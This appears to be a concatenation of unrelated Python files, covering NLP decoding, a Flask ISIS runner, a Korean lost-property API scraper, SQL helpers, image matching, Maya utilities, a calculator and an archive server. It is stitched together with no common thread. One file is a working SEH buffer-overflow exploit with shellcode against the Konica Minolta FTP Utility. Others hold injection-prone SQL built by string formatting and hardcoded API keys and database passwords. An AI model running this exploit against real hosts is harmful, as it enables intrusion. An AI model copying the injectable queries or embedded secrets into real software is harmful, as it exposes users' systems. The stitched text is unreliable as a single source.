tag_sequence = torch.cat([zero_sentinel, tag_sequence, zero_sentinel], 0)
sequence_length = tag_sequence.size(0)
path_scores = []
path_indices = []
if tag_observations[0] != -1:
one_hot = torch.zeros(num_tags)
one_hot[tag_observations[0]] = 100000.0
path_scores.append(one_hot.unsqueeze(0))
else:
path_scores.append(tag_sequence[0, :].unsqueeze(0))
# Evaluate the scores for all possible paths.
for timestep in range(1, sequence_length):
# Add pairwise potentials to current scores.
summed_potentials = path_scores[timestep - 1].unsqueeze(2) + transition_matrix
summed_potentials = summed_potentials.view(-1, num_tags)
# Best pairwise potential path score from the previous timestep.
max_k = min(summed_potentials.size()[0], top_k)
scores, paths = torch.topk(summed_potentials, k=max_k, dim=0)
# If we have an observation for this timestep, use it
# instead of the distribution over tags.
observation = tag_observations[timestep]
# Warn the user if they have passed
# invalid/extremely unlikely evidence.
if tag_observations[timestep - 1] != -1 and observation != -1:
if transition_matrix[tag_observations[timestep - 1], observation] < -10000:
logger.warning(
"The pairwise potential between tags you have passed as "
"observations is extremely unlikely. Double check your evidence "
"or transition potentials!"
)
if observation != -1:
one_hot = torch.zeros(num_tags)
one_hot[observation] = 100000.0
path_scores.append(one_hot.unsqueeze(0))
else:
path_scores.append(tag_sequence[timestep, :] + scores)
path_indices.append(paths.squeeze())
# Construct the most likely sequence backwards.
path_scores_v = path_scores[-1].view(-1)
max_k = min(path_scores_v.size()[0], top_k)
viterbi_scores, best_paths = torch.topk(path_scores_v, k=max_k, dim=0)
viterbi_paths = []
for i in range(max_k):
viterbi_path = [best_paths[i]]
for backward_timestep in reversed(path_indices):
viterbi_path.append(int(backward_timestep.view(-1)[viterbi_path[-1]]))
# Reverse the backward path.
viterbi_path.reverse()
if has_start_end_restrictions:
viterbi_path = viterbi_path[1:-1]
# Viterbi paths uses (num_tags * n_permutations) nodes; therefore, we need to modulo.
viterbi_path = [j % num_tags for j in viterbi_path]
viterbi_paths.append(viterbi_path)
if flatten_output:
return viterbi_paths[0], viterbi_scores[0]
return viterbi_paths, viterbi_scores
def allowed_transitions(constraint_type: str, labels: Dict[int, str]) -> List[Tuple[int, int]]:
"""
Given labels and a constraint type, returns the allowed transitions. It will
additionally include transitions for the start and end states, which are used
by the conditional random field.
Parameters
----------
constraint_type : ``str``, required
Indicates which constraint to apply. Current choices are
"BIO", "IOB1", "BIOUL", and "BMES".
labels : ``Dict[int, str]``, required
A mapping {label_id -> label}. Most commonly this would be the value from
Vocabulary.get_index_to_token_vocabulary()
Returns
-------
``List[Tuple[int, int]]``
The allowed transitions (from_label_id, to_label_id).
"""
num_labels = len(labels)
start_tag = num_labels
end_tag = num_labels + 1
labels_with_boundaries = list(labels.items()) + [(start_tag, "START"), (end_tag, "END")]
allowed = []
for from_label_index, from_label in labels_with_boundaries:
if from_label in ("START", "END"):
from_tag = from_label
from_entity = ""
else:
from_tag = from_label[0]
from_entity = from_label[1:]
for to_label_index, to_label in labels_with_boundaries:
if to_label in ("START", "END"):
to_tag = to_label
to_entity = ""
else:
to_tag = to_label[0]
to_entity = to_label[1:]
if is_transition_allowed(constraint_type, from_tag, from_entity, to_tag, to_entity):
allowed.append((from_label_index, to_label_index))
return allowed
def is_transition_allowed(
constraint_type: str, from_tag: str, from_entity: str, to_tag: str, to_entity: str
):
"""
Given a constraint type and strings ``from_tag`` and ``to_tag`` that
represent the origin and destination of the transition, return whether
the transition is allowed under the given constraint type.
Parameters
----------
constraint_type : ``str``, required
Indicates which constraint to apply. Current choices are
"BIO", "IOB1", "BIOUL", and "BMES".
from_tag : ``str``, required
The tag that the transition originates from. For example, if the
label is ``I-PER``, the ``from_tag`` is ``I``.
from_entity: ``str``, required
The entity corresponding to the ``from_tag``. For example, if the
label is ``I-PER``, the ``from_entity`` is ``PER``.
to_tag : ``str``, required
The tag that the transition leads to. For example, if the
label is ``I-PER``, the ``to_tag`` is ``I``.
to_entity: ``str``, required
The entity corresponding to the ``to_tag``. For example, if the
label is ``I-PER``, the ``to_entity`` is ``PER``.
Returns
-------
``bool``
Whether the transition is allowed under the given ``constraint_type``.
"""
if to_tag == "START" or from_tag == "END":
# Cannot transition into START or from END
return False
if constraint_type == "BIOUL":
if from_tag == "START":
return to_tag in ("O", "B", "U")
if to_tag == "END":
return from_tag in ("O", "L", "U")
return any(
[
# O can transition to O, B-* or U-*
# L-x can transition to O, B-*, or U-*
# U-x can transition to O, B-*, or U-*
from_tag in ("O", "L", "U") and to_tag in ("O", "B", "U"),
# B-x can only transition to I-x or L-x
# I-x can only transition to I-x or L-x
from_tag in ("B", "I") and to_tag in ("I", "L") and from_entity == to_entity,
]
)
elif constraint_type == "BIO":
if from_tag == "START":
return to_tag in ("O", "B")
if to_tag == "END":
return from_tag in ("O", "B", "I")
return any(
[
# Can always transition to O or B-x
to_tag in ("O", "B"),
# Can only transition to I-x from B-x or I-x
to_tag == "I" and from_tag in ("B", "I") and from_entity == to_entity,
]
)
elif constraint_type == "IOB1":
if from_tag == "START":
return to_tag in ("O", "I")
if to_tag == "END":
return from_tag in ("O", "B", "I")
return any(
[
# Can always transition to O or I-x
to_tag in ("O", "I"),
# Can only transition to B-x from B-x or I-x, where
# x is the same tag.
to_tag == "B" and from_tag in ("B", "I") and from_entity == to_entity,
]
)
elif constraint_type == "BMES":
if from_tag == "START":
return to_tag in ("B", "S")
if to_tag == "END":
return from_tag in ("E", "S")
return any(
[
# Can only transition to B or S from E or S.
to_tag in ("B", "S") and from_tag in ("E", "S"),
# Can only transition to M-x from B-x, where
# x is the same tag.
to_tag == "M" and from_tag in ("B", "M") and from_entity == to_entity,
# Can only transition to E-x from B-x or M-x, where
# x is the same tag.
to_tag == "E" and from_tag in ("B", "M") and from_entity == to_entity,
]
)
else:
raise (f"Unknown constraint type: {constraint_type}") |
# CDT8 SVL - M. Nebut - 03/2016
# programmation par contrats avec contract.py
class Compte:
"""
compte non plafonne, avec decouvert autorisable
>>> compte = Compte()
>>> compte.autoriser_decouvert(-100.0)
inv:
implies(self.decouvert_autorise,
self.montant >= self.decouvert,
self.montant >= 0)
"""
def __init__(self):
"""
post:
self.montant == 0.0
not self.decouvert_autorise
"""
self.montant = 0.0
self.decouvert_autorise = False
self.decouvert = None
def autoriser_decouvert(self, decouvert):
"""
autorise le decouvert jusqu'a 'decouvert'
pre:
decouvert < 0.0
post:
self.decouvert_autorise
self.decouvert == decouvert
"""
self.decouvert = decouvert
self.decouvert_autorise = True
def debiter(self, somme):
"""
pre:
somme > 0
post[self.montant]:
self.montant == __old__.self.montant - somme
# self.decouvert_autorise => self.montant >= self.decouvert
# (not self.decouvert_autorise) => self.montant >= 0
implies(self.decouvert_autorise,
self.montant >= self.decouvert,
self.montant >=0)
"""
self.montant -= somme
def crediter(self, somme):
"""
pre:
somme > 0
post[self.montant]:
self.montant == __old__.self.montant + somme
"""
self.montant += somme
class ComptePlafonne(Compte):
"""
ex d'heritage comportemental
illustration principe de Liskiv viole
ici implicitement invariant de Compte
inv:
self.montant <= self.plafond
"""
def __init__(self, max):
"""
post:
max > 0
"""
self.plafond = max
self.montant = 0.0
self.decouvert_autorise = False
self.decouvert = None
def crediter(self, somme):
"""
heritage implicite de la post-condition
pre:
somme > 0
self.montant + somme <= self.plafond
# precondition invalide !
"""
self.montant += somme
import contract
contract.checkmod(__name__)
if __name__ == '__main__':
compte = ComptePlafonne(200.0)
compte.crediter(500)
|
import logging
from os import chdir, getcwd, getenv
from os.path import exists as path_exists, join as path_join, basename
from os import remove
from subprocess import run as sp_run, PIPE, DEVNULL
from urllib.request import urlretrieve
from uuid import uuid4
from logging import getLogger
from tempfile import NamedTemporaryFile
from flask import request, jsonify
from .._config import ISISServerConfig
logger = getLogger("ISIS")
def _serialize_command_args(arg_dict):
args = list()
listfiles = list()
for k, v in arg_dict.items():
# If the argument is a list, isis wants a "listfile"
if isinstance(v, list):
list_file = "{}.lis".format(uuid4())
with open(list_file, 'w') as f:
for item in v:
print(item, file=f)
v = list_file
listfiles.append(list_file)
args.append("{}={}".format(k, str(v)))
# Return the listfiles too so we can clean them up
return args, listfiles
def run_isis():
temp_files = list()
listfiles = list()
orig_dir = getcwd()
chdir(ISISServerConfig.work_dir())
try:
body = request.get_json()
# Only allow executables in the conda bin
command = path_join(
getenv("ISISROOT"),
"bin",
body["program"].strip("/")
)
if not path_exists(command):
return jsonify({"message": "Command not found"}), 404
remote_files = body.pop("remotes", [])
# Download any arguments that are tagged as remote files
for arg_key in remote_files:
if arg_key not in body["args"].keys():
return jsonify({
"message": "remote '{}' not found in args".format(arg_key)
}), 400
url = body["args"][arg_key]
dl_file = NamedTemporaryFile('r+', dir=getcwd())
urlretrieve(url, dl_file.name)
temp_files.append(dl_file)
body["args"][arg_key] = dl_file.name
command_args, listfiles = _serialize_command_args(body["args"])
status = 200
response = {"message": "Command executed successfully"}
proc = sp_run([command, *command_args], stdout=DEVNULL, stderr=PIPE)
if not proc.returncode == 0:
status = 500
stderr = proc.stderr.decode("utf-8")
response["message"] = stderr
err_msg = "{} failed\n{}".format(
' '.join([basename(command), *command_args]),
stderr
)
logging.error(err_msg)
return jsonify(response), status
finally:
# Auto-cleanup listfiles
[remove(f) for f in listfiles if path_exists(f)]
# Clean up temp files
[f.close() for f in temp_files]
# Change back to original working directory
chdir(orig_dir)
|
# Title: Konica Minolta FTP Utility - Remote Command Execution
# Date : 20/09/2015
# Author: R-73eN
# Software: Konica Minolta FTP Utility v1.0
# Tested: Windows XP SP3
# Software link: http://download.konicaminolta.hk/bt/driver/mfpu/ftpu/ftpu_10.zip
# Every command is vulnerable to buffer overflow.
import socket
import struct
shellcode = ""#msfvenom -p windows/exec cmd=calc.exe -f python -b "\x00\x0d\x0a\x3d\x5c\x2f"
shellcode += "\xbd\xfe\xbd\x27\xc9\xda\xd8\xd9\x74\x24\xf4\x5e\x29"
shellcode += "\xc9\xb1\x31\x31\x6e\x13\x83\xee\xfc\x03\x6e\xf1\x5f"
shellcode += "\xd2\x35\xe5\x22\x1d\xc6\xf5\x42\x97\x23\xc4\x42\xc3"
shellcode += "\x20\x76\x73\x87\x65\x7a\xf8\xc5\x9d\x09\x8c\xc1\x92"
shellcode += "\xba\x3b\x34\x9c\x3b\x17\x04\xbf\xbf\x6a\x59\x1f\xfe"
shellcode += "\xa4\xac\x5e\xc7\xd9\x5d\x32\x90\x96\xf0\xa3\x95\xe3"
shellcode += "\xc8\x48\xe5\xe2\x48\xac\xbd\x05\x78\x63\xb6\x5f\x5a"
shellcode += "\x85\x1b\xd4\xd3\x9d\x78\xd1\xaa\x16\x4a\xad\x2c\xff"
shellcode += "\x83\x4e\x82\x3e\x2c\xbd\xda\x07\x8a\x5e\xa9\x71\xe9"
shellcode += "\xe3\xaa\x45\x90\x3f\x3e\x5e\x32\xcb\x98\xba\xc3\x18"
shellcode += "\x7e\x48\xcf\xd5\xf4\x16\xd3\xe8\xd9\x2c\xef\x61\xdc"
shellcode += "\xe2\x66\x31\xfb\x26\x23\xe1\x62\x7e\x89\x44\x9a\x60"
shellcode += "\x72\x38\x3e\xea\x9e\x2d\x33\xb1\xf4\xb0\xc1\xcf\xba"
shellcode += "\xb3\xd9\xcf\xea\xdb\xe8\x44\x65\x9b\xf4\x8e\xc2\x53"
shellcode += "\xbf\x93\x62\xfc\x66\x46\x37\x61\x99\xbc\x7b\x9c\x1a"
shellcode += "\x35\x03\x5b\x02\x3c\x06\x27\x84\xac\x7a\x38\x61\xd3"
shellcode += "\x29\x39\xa0\xb0\xac\xa9\x28\x19\x4b\x4a\xca\x65"
banner = ""
banner +=" ___ __ ____ _ _ \n"
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
print banner
nSEH = "\xEB\x13\x90\x90"
SEH = struct.pack('<L',0x1220401E)
evil = "A" * 8343 + nSEH + SEH + "\x90" * 22 + shellcode +"D" * (950 - len(shellcode))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server = raw_input('Enter IP : ')
s.connect((server, 21))
a = s.recv(1024)
print ' [+] ' + a
s.send('User ' + evil )
print '[+] https://www.infogen.al/ [+]'
|
# 경찰청 분실물 api 활용(mysql과 연동해서 db 저장까지 함)
import urllib.request as ul
import xmltodict
import pymysql.cursors
import sys
from datetime import datetime,timedelta
date=datetime.today() - timedelta(10) #과거 날짜
date_s = str(date)
year = date_s[0:4]
month = date_s[5:7]
day = date_s[8:10]
START_YMD = year+month+day
date=datetime.today() #현재 날짜
date_s = str(date)
year = date_s[0:4]
month = date_s[5:7]
day = date_s[8:10]
END_YMD = year+month+day
# START_YMD = "20190729"
# END_YMD = "20190731"
print("\n\n/****************************************/")
print(" "+START_YMD+"~"+END_YMD+"동안의 데이터 수집")
print("/****************************************/\n\n")
conn = pymysql.connect(
host='localhost',
user='root',
password='0000',
db='findlost',
charset='utf8'
)
cursor = conn.cursor()
# 기존 테이블 데이터 삭제
sql = "call del()"
cursor.execute(sql)
conn.commit()
numOfData = 0
numOfRows = 100
pageNo = 1
# 일정 시간이 지나면 db 프로시저를 호출한다.(리눅스 스케쥴러로 우분투에서 사용할 계획)
# 호출된 db 프로시저는 기존 db table을 drop하고 다시 테이블을 생성한다.
# 포털기관 습득물 데이터 받아오기
# for num in (0, 3):
# print("num값")
# print(num)
num=0
while 1:
if num == 0:
print("습득물 데이터를 받아오는 중입니다...")
url = f"http://apis.data.go.kr/1320000/LosfundInfoInqireService/getLosfundInfoAccToClAreaPd?serviceKey=XkqweN6T4XhKJwYFZTcyVC2BYwqckYugERg6R%2FMu26u96JtR7X8ifsqv5AWZQsHcRAty%2FAYkQf" \
f"lO%2FC3SAm5OEw%3D%3D&START_YMD={START_YMD}&END_YMD={END_YMD}&numOfRows={numOfRows}&pageNo={pageNo}" # 습득물
elif num == 1:
print("분실 휴대폰 데이터를 받아오는 중입니다...")
url = f"http://apis.data.go.kr/1320000/SearchMoblphonInfoInqireService/getMoblphonAcctoKindAreaPeriodInfo?serviceKey=XkqweN6T4XhKJwYFZTcyVC2BYwqckYugERg6R%2FMu26u96JtR7X8ifsqv5AWZQsH" \
f"cRAty%2FAYkQflO%2FC3SAm5OEw%3D%3D&START_YMD={START_YMD}&END_YMD={END_YMD}&numOfRows={numOfRows}&pageNo={pageNo}" # 휴대폰
elif num == 2:
print("습득물(포털기관) 데이터를 받아오는 중입니다...")
url = f"http://apis.data.go.kr/1320000/LosPtfundInfoInqireService/getPtLosfundInfoAccToClAreaPd?serviceKey=XkqweN6T4XhKJwYFZTcyVC2BYwqckYugERg6R%2FMu26u96JtR7X8ifsqv5AWZQsHcRAty%2FAY" \
f"kQflO%2FC3SAm5OEw%3D%3D&START_YMD={START_YMD}&END_YMD={END_YMD}&numOfRows={numOfRows}&pageNo={pageNo}" # 습득물(포털기관)
elif num == 3:
print("데이터 수집이 완료 되었습니다!!")
break
request = ul.Request(url) # 요청
# 메세지를 보낸다.
response = ul.urlopen(request) # 응답 메세지를 오픈한다.
rescode = response.getcode() # 제대로 데이터가 수신됐는지 확인하는 코드 성공시 200
if (rescode == 200):
responseData = response.read() # 요청받은 데이터를 읽음
rD = xmltodict.parse(responseData) # XML형식의 데이터를 dict형식으로 변환시켜줌
#print(rD) #정상적으로 데이터가 출력되는지 확인
w_data = rD["response"]["body"]["items"]["item"] # item 데이터만 정제
#print(w_data)
totalCount = rD["response"]["body"]["totalCount"]
print("총 데이터 개수 "+totalCount)
for i in w_data: # 다수의 item들을 하나씩 뽑아온다.
numOfData += 1
print(pageNo)
print(numOfData,"번째 데이터")
print("관리ID: " + i["atcId"])
print("습득일자 : " + i["fdYmd"])
print("물품명: " + i["fdPrdtNm"])
print("보관장소 : " + i["depPlace"])
print("이미지: " + i["fdFilePathImg"])
print("물품상세설명 : " + i["fdSbjt"])
print("물품분류명 : " + i["prdtClNm"] + "\n")
sql = "insert into main_lostitemstemp(managementID, findYmd, productName, keepPlace, productImg, productDesc, productClass) values(%s, %s, %s, %s, %s, %s, %s)"
cursor.execute(sql, (i["atcId"], i["fdYmd"], i["fdPrdtNm"], i["depPlace"], i["fdFilePathImg"], i["fdSbjt"], i["prdtClNm"]))
conn.commit()
if (numOfData >= int(totalCount)):
pageNo=0
numOfData=0
num+=1
pageNo += 1
sql = "call changeTable()" #테이블 교체
cursor.execute(sql)
conn.commit()
|
#Input
#The first line of input contains a single decimal integer P, (1≤P≤1000), which is the number of data sets that follow. Each data set should be processed identically and independently.
#Each data set consists of a single line of input.
#It contains the data set number, K,
#followed by the base, b (3≤b≤16) as a decimal integer,
#followed by the positive integer, n (as a decimal integer) for which the Sum Squared Digits function is to be computed with respect to the base b. n will fit in a 32 bit unsigned integer. The data set number K starts at 1 and is incremented by 1 for each data set.
#Output
#For each data set there is a single line of output.
#The single line of output consists of the data set number, K,
#followed by a single space followed by the value of SSD(b,n) as a decimal integer.
#Sample Input 1
#3
#1 10 1234
#2 3 98765
#3 16 987654321
#Sample Output 1
#1 30
#2 19
#3 696
def sum_of_squares(k, b, n):
result = 0
while n != 0:
remainder = n % b
n = int(n / b)
result += remainder ** 2
print(k, result)
# read first line
number_of_lines = int(input())
# read all remaining lines
for i in range(number_of_lines):
line = input()
args = line.split();
k = int(args[0]);
b = int(args[1]);
n = int(args[2]);
sum_of_squares(k, b, n) |
import boto.ec2
import WH
site_id=40466
if __name__ == '__main__':
wh = WH.WH()
wh.connect()
conn = boto.ec2.connect_to_region("us-west-2")
for a in conn.get_all_addresses():
print "%s" % (a.public_ip)
print wh.add_allowed_host(site_id,"http",a.public_ip).request
print wh.add_allowed_host(site_id,"https",a.public_ip).request
print wh.add_entry_point(site_id,"GET","http://" + a.public_ip + "/").request
print wh.add_entry_point(site_id,"GET","https://" + a.public_ip + "/").request
|
class StepSql:
def add(self, step):
query= "insert into tb_e2e_trace_steps \
(step_seq, trace_seq, step_title, mainclass, subclass, request_cmd, request_param, request_time) \
values (%d, %s, '%s', '%s', '%s', '%s', '%s', now())" % (step.seq, step.traceseq, step.title, step.mainclass, step.subclass, step.requestcmd, step.requestparam)
return query
def get_max_seq(self, trace_seq):
query= "select max(step_seq) as seq from tb_e2e_trace_steps \
where trace_seq = %s" % (trace_seq)
return query
def delete(self):
query = "delete from tb_e2e_trace_steps \
where step_seq = %d and trace_seq = %d" % (self.seq, self.traceseq)
return query
def update(self):
query = "update tb_e2e_trace_list \
set response_status = %d, message_detail = '%s', response_time = now() \
where step_seq = %d and trace_seq = %d" % (self.responsestatus, self.responsemessage, self.seq, self.traceseq)
return query
class Step(object):
def __init__(self, seq, traceseq, title, mainclass, subclass, requestcmd, requestparam):
self.seq = seq
self.traceseq = traceseq
self.title = title
self.mainclass = mainclass
self.subclass = subclass
self.requestcmd = requestcmd
self.requestparam = requestparam
def set_request(self, request_cmd, request_param):
self.requestcmd = request_cmd
self.requestparam = request_param
def set_response(self, response_status, response_message):
self.responsestatus = response_status
self.responsemessage = response_message
|
# Copyright 2017 The Forseti Security Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Common utilities to assist in inventory pipelines."""
# pylint: disable=line-too-long
from google.cloud.security.inventory.pipeline_requirements_map import REQUIREMENTS_MAP
# pylint: enable=line-too-long
# TODO: The next editor must remove this disable and correct issues.
# pylint: disable=missing-type-doc,missing-return-type-doc
# pylint: disable=missing-param-doc
def can_inventory_groups(configs):
"""A simple function that validates required inputs to inventory groups.
Args:
The input flags converted to a dict.
Returns:
Boolean
"""
required_execution_config_flags = [
configs.get('domain_super_admin_email'),
configs.get('groups_service_account_key_file')]
return all(required_execution_config_flags)
def list_resource_pipelines():
"""Prints resources (keys) in the pipeline REQUIREMENTS_MAP (dict)."""
resources = ', '.join(REQUIREMENTS_MAP.keys())
print 'Available resources: %s' % resources
|
import cv2
import numpy as np
from matplotlib import pyplot as plt
import time
###########################
image = cv2.imread('a3.jpg',1)
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
blurred = cv2.GaussianBlur(gray, (15, 15), 0)
thresh = ~(cv2.threshold(blurred, 200, 255, cv2.THRESH_BINARY)[1])
#cv2.imshow("test",thresh)
sum_col = sum(thresh)
for i in range(len(sum_col)):
if sum_col[i] != 0 :
break
print(i)
ini = i
sum_col_rev = sum_col[::-1]
for i in range(len(sum_col_rev)):
if sum_col_rev[i] != 0 :
break
fnl = len(sum_col_rev) - i
print(fnl)
sum_row = sum(cv2.transpose(thresh))
for i in range(len(sum_row)):
if sum_row[i] != 0 :
break
print(i)
ini_r = i
sum_row_rev = sum_row[::-1]
for i in range(len(sum_row_rev)):
if sum_row_rev[i] != 0 :
break
fnl_r = len(sum_row_rev) - i
print(fnl)
image = image[ini_r:fnl_r , ini:fnl]
cv2.imshow("Image", image)
#cv2.imwrite('test.jpg',image)
###########################
all_sum = []
###########################
all_plate = []
for i in range(10):
plate = ('province_crop%d.jpg'%(i))
all_plate.append(plate)
print(all_plate)
for j in range(len(all_plate)):
img = cv2.imread(all_plate[j],0)
##
template = cv2.imread('test.jpg',0)
w, h = template.shape[::-1]
w1,h1 = img.shape[::-1]
resized = cv2.resize(img, (w,h))
ret1,img_1 = cv2.threshold(template,0,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)
ret2,img_2 = cv2.threshold(resized,0,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)
##cv2.imshow("img ", img_1)
##cv2.imshow("resized ", img_2)
img_3 = abs(img_1-img_2)
##
##cv2.imshow("3", img_3)
##
##print(type(img_3))
sum_img = sum(sum(img_3))
all_sum.append(sum_img)
min_of_all = min(all_sum)
print("len = ",len(all_sum))
print("min = ",min_of_all)
for i in range(len(all_sum)):
print("sum = ",all_sum[i])
if(min_of_all==all_sum[i]):
index = i
break
print(index)
imageshow = cv2.imread(all_plate[index],0)
cv2.imshow("show",imageshow)
print(all_sum)
|
"""
nodes @ utils
"""
import maya.cmds as mc
def remapNode(
ctrlAt,
targetAt,
ctrlMinMax,
targetMinMax,
addVal = False
):
remapNode = mc.createNode('remapValue', n = 're' + ctrlAt)
addNode = mc.createNode('plusMinusAverage') # to get any preexisiting values
if(addVal):
currentVal = mc.getAttr(targetAt)
else:
currentVal = 0
mc.setAttr(addNode + '.input1D[0]', currentVal)
mc.setAttr(remapNode + '.inputMin', ctrlMinMax[0])
mc.setAttr(remapNode + '.inputMax', ctrlMinMax[1])
mc.setAttr(remapNode + '.outputMin', targetMinMax[0])
mc.setAttr(remapNode + '.outputMax', targetMinMax[1])
mc.connectAttr(ctrlAt, remapNode + '.inputValue')
mc.connectAttr(remapNode + '.outValue', addNode + '.input1D[1]')
mc.connectAttr(addNode + '.output1D', targetAt)
return remapNode |
import math as _math
def ducks_in_earth(duck_volume, R_EARTH=6378e3):
"""Compute the number of ducks that fit in the earth
Args:
duck_volume (float): Volume of one rubber duck [m^3]
R_EARTH (float): Earth's equatorial radius [m] Default: 6,378,000.0
Returns:
num_ducks (int): Number of whole ducks that it would take to fill the Earth
"""
return _math.floor((4/3*_math.pi*R_EARTH**3)/duck_volume) |
#calculator program
def add(a,b):
print(a+b)
def sub(a,b):
print(a-b)
def multi(a,b):
print(a*b)
def div(a,b):
z=int(input("to get value in float select 1 else 2"))
if(z==1):
print(a/b)
elif(z==2):
print(a//b)
else:
print("invalid")
def mod(a,b):
print(a%b)
#main
print("BASIC CALCULATOR")
print("#"*7)
c="yes"
while c.lower() =="yes":
print("MENU \n1.)TO ADD \n2.)TO SUBTRACT \n3.)TO MULTIPY \n4.)TO DIVIDE \n5.)MODULO ")
d=int(input("enter the option"))
print("enter the values:")
a=int(input("enter value for a:"))
b=int(input("enter value for b:"))
if(d==1):
add(a,b)
elif(d==2):
sub(a,b)
elif(d==3):
multi(a,b)
elif(d==4):
div(a,b)
elif(d==5):
mod(a,b)
else:
print("invalid")
z=input("do you want to continue")
if(z=="no"):
print("BYE")
break
|
"""runner functions for entry points."""
import os
import sys
import argparse
import cmd
import getpass
import pprint
import hashlib
from twisted.internet import reactor, task
from twisted.internet.endpoints import TCP4ServerEndpoint
from twisted.internet.defer import inlineCallbacks
from twisted.python import log
from cryptarchive import constants
from cryptarchive.challenge import Challenge
from cryptarchive.client import CryptarchiveTxClient
from cryptarchive.socketclient import CryptarchiveSocketClient, CryptarchiveSocketConnection
from cryptarchive.server import CryptarchiveServerFactory
from cryptarchive.usermanager import UserManager
from cryptarchive.reconstruct import reconstruct
CLIENTS = {
"tx": CryptarchiveTxClient,
"socket": CryptarchiveSocketClient,
}
class CreateUserPrompt(cmd.Cmd):
"""REPL-loop for creating users."""
def __init__(self, usermanager, ns):
cmd.Cmd.__init__(self)
self.usermanager = usermanager
self.ns = ns
self.prompt = "[{p}]".format(p=os.path.abspath(ns.path))
self.intro = "Cryptarchive [Python version: {pyv}; protocol version {comv}]\nType 'help' for help.".format(
pyv=sys.version,
comv=constants.COM_VERSION,
)
def do_quit(self, cmd):
"""quit the REPL-loop"""
return True
do_exit = do_q = do_quit
def do_list_userids(self, cmd):
"""lists the userids."""
users = os.listdir(self.ns.path)
for user in users:
self.stdout.write(user + "\n")
def do_get_userid(self, cmd):
"""calculate the userid for the username."""
uid = self.usermanager.get_userid(cmd)
self.stdout.write(uid + "\n")
def do_remove_user_by_name(self, cmd):
"""remove the user with the username"""
userid = self.usermanager.get_userid(cmd)
p = self.usermanager.get_user_path(userid)
if p.exists():
p.remove()
else:
self.stdout.write("Error: No such user!\n")
def do_remove_user_by_userid(self, cmd):
"""remove the user with the userid"""
p = self.usermanager.get_user_path(cmd)
if p.exists():
p.remove()
else:
self.stdout.write("Error: No such user!\n")
def do_create_user(self, cmd):
"""create a new user."""
userid = self.usermanager.get_userid(cmd)
if self.usermanager.user_exists(userid):
self.stdout.write("Error: user already exists!\n")
return
userpath = self.usermanager.get_user_path(userid)
password = getpass.getpass("Password for '{un}': ".format(un=cmd))
authblock, hash = Challenge.generate_authblock_and_hash(password, hash_password=True)
userpath.makedirs()
self.usermanager.get_authblock_path(userid).setContent(authblock)
self.usermanager.get_hash_path(userid).setContent(hash)
def do_reconstruct_index(self, cmd):
"""attemp reconstruct the index of the user with the userid."""
p = self.usermanager.get_user_path(cmd)
if not p.exists():
self.stdout.write("Error: No such user!\n")
return
# decrypt old index
enc_old_index = p.child(constants.INDEX_FILE_NAME).getContent()
password = getpass.getpass("Password for '{un}': ".format(un=cmd))
hp = hashlib.sha256(password).digest()
conn = CryptarchiveSocketConnection("", "", hp)
cipher = conn._get_cipher()
old_index = cipher.decrypt(enc_old_index)
filelist = p.listdir()
for fn in (constants.INDEX_FILE_NAME, "hash.bin", "authblock.bin"):
if fn in filelist:
filelist.remove(fn)
index = reconstruct(old_index, filelist, verbose=True)
# encrypt new index
cipher = conn._get_cipher()
enc_index = cipher.encrypt(index.dumps())
p.child(constants.INDEX_FILE_NAME).setContent(enc_index)
def scan_dir_for_upload(path, remotebase):
"""
Scans a directory for uploading a directory.
:param path: path to scan
:type path: str
:param remotebase: path to which should be uploaded.
:type remotebase: str
:return: A tuple ([directories to create], [(sourcefile, targetfile)])
:rtype: tuple of (list of str, list of tuples of (str, str))
"""
dirs_to_create = []
files_to_upload = []
for fn in os.listdir(path):
fp = os.path.join(path, fn)
rp = os.path.join(remotebase, fn)
if os.path.isdir(fp):
dirs_to_create.append(rp)
sd, sf = scan_dir_for_upload(fp, rp)
dirs_to_create += sd
files_to_upload += sf
elif os.path.isfile(fp):
files_to_upload.append((fp, rp))
else:
raise NotImplementedError("Can not handle: {p}".format(p=fp))
return (dirs_to_create, files_to_upload)
def scan_dir_for_download(index, remotepath, base):
"""
Scans a directory for uploading a directory.
:param index: index to scan
:type index: str
:param remotepath: path to scan
:type remotepath: str
:param base: path to which should be downloaded.
:type base: str
:return: A tuple ([directories to create], [(sourcefile, targetfile)])
:rtype: tuple of (list of str, list of tuples of (str, str))
"""
dirs_to_create = []
files_to_download = []
for fn, isdir in index.listdir(remotepath):
while fn.startswith("/"):
fn = fn[1:]
rp = os.path.join(remotepath, fn)
fp = os.path.join(base, fn)
if isdir:
dirs_to_create.append(fp)
sd, sf = scan_dir_for_download(index, rp, fp)
dirs_to_create += sd
files_to_download += sf
else:
files_to_download.append((rp, fp))
return (dirs_to_create, files_to_download)
def server_main():
"""entry point for the server"""
parser = argparse.ArgumentParser(description="The Cryptarchive Server")
parser.add_argument("path", action="store", help="path of files")
parser.add_argument("-i", "--interface", action="store", help="interface to listen on", default="0.0.0.0")
parser.add_argument("-p", "--port", action="store", type=int, default=constants.DEFAULT_PORT, help="port to listen on")
parser.add_argument("-v", "--verbose", action="store_true", help="be more verbose")
parser.add_argument("--manage-users", action="store_true", help="open a REPL-loop for creating users")
ns = parser.parse_args()
if not os.path.exists(ns.path):
print "No such file or directory: '{p}'".format(p=ns.path)
sys.exit(2)
if ns.manage_users:
usermanager = UserManager(ns.path)
cmdo = CreateUserPrompt(usermanager, ns)
cmdo.prompt = cmdo.prompt.format(p=ns.path)
cmdo.cmdloop()
sys.exit(0)
if ns.verbose:
log.startLogging(sys.stdout)
factory = CryptarchiveServerFactory(ns.path, verbose=ns.verbose)
ep = TCP4ServerEndpoint(reactor, port=ns.port, interface=ns.interface)
ep.listen(factory)
reactor.run()
def client_main():
